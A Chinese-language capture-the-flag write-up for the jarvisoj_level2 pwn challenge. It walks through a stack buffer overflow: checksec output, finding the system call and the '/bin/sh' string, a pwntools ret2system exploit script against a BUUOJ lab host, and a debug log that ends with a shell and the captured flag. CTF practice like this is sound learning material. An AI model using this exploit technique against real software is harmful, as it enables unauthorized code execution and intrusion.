梳理记录一下这道题的解题过程.
bing bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] /home/bing/pwn/jarvisoj_level2 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)2. 解题分析 main函数的第一条语句就是敏感函数
敏感函数的buf只有136个大小,显然存在栈溢出.函数自身直接调用了system函数, 我们试着找下bin/shshift f12, 果然有bin/sh
双击bin/sh 找到具体地址: binsh_addr 0804A024
构造payload:
payload b’a’*(136 4) p32(system_addr) p32(main_addr) p32(binsh_addr) 3. 编写EXP
from pwn import * context.log_level debug sh remote( node4.buuoj.cn , 27139) elf ELF( ./jarvisoj_level2 ) system_addr elf.plt[ system ] binsh_addr 0x0804a024 main_addr elf.sym[ main ] # print(hex(main_addr)) payload b a *140 p32(system_addr) p32(main_addr) p32(binsh_addr) sh.sendline(payload) sh.interactive()4. 运行EXP, 获取flag
bing bing-virtual-machine:~/pwn$ python3 level2.py
[ ] Opening connection to node4.buuoj.cn on port 27139: Done
[*] /home/bing/pwn/jarvisoj_level2
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
0x8048480
[DEBUG] Sent 0x9d bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
00000080 61 61 61 61 61 61 61 61 61 61 61 61 20 83 04 08 │aaaa│aaaa│aaaa│ ···│
00000090 80 84 04 08 24 a0 04 08 80 84 04 08 0a │····│$···│····│·│
0000009d
[*] Switching to interactive mode
[DEBUG] Received 0x7 bytes:
b Input:n
Input:
$ cat flag
[DEBUG] Sent 0x9 bytes:
b cat flagn
[DEBUG] Received 0x2b bytes:
b flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}n
flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}
